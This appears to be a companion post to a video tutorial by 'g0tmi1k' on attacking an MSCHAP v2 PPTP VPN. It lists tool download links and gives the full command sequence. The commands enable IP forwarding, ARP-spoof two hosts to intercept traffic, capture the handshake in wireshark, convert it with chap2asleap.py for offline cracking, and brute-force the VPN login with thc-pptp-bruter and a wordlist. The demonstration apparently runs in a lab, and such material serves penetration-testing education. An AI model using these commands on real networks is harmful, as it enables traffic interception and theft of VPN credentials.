Links
Watch on-line: http://g0tmi1k.blip.tv/file/3356422
Download: http://www.mediafire.com/?qzncjwamjix
Commands: http://pastebin.com/RuaqiV6L
Script (chap2asleap.py): http://www.mediafire.com/?yng1zmkxuem


What is this?
This video demostrates an offline (asleap) and online (THC-pptp-bruter) attack on MSCHAP v2 software VPN.


What do I need?

> asleap
> wireshark
> chap2asleap.py & python
> THC-pptp-bruter
> VPN


Software
Name: asleap
Version: 2.2
Home Page: http://www.willhackforsushi.com/Asleap.html
Download Link: http://www.willhackforsushi.com/code...asleap-2.2.tgz

Name: THC-pptp-bruter
Version: 0.1.4
Home Page: http://freeworld.thc.org
Download Link: http://freeworld.thc.org/download.ph...r-0.1.4.tar.gz

Name: chap2asleap.py
Version: 1.0
Home Page: http://g0tmi1k.blogspot.com
Download Link: http://www.mediafire.com/?yng1zmkxuem



Commands:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth1 -t 10.0.0.3 10.0.0.9

arpspoof -i eth1 -t 10.0.0.9 10.0.0.3

wireshark -i eth1 -k

python chap2asleap.py
python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v

cd /pentest/passwords/wordlists.lst
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3

Notes:
More information about the script - http://g0tmi1k.blogspot.com/2010/03/...2asleappy.html

Song: Two Fingers - Keman Rhythm
Video length: 03:03
Capture length: 5:48

Blog Post: http://g0tmi1k.blogspot.com/2010/03/...-thc-pptp.html
Forum Post: http://www.backtrack-linux.org



~g0tmi1k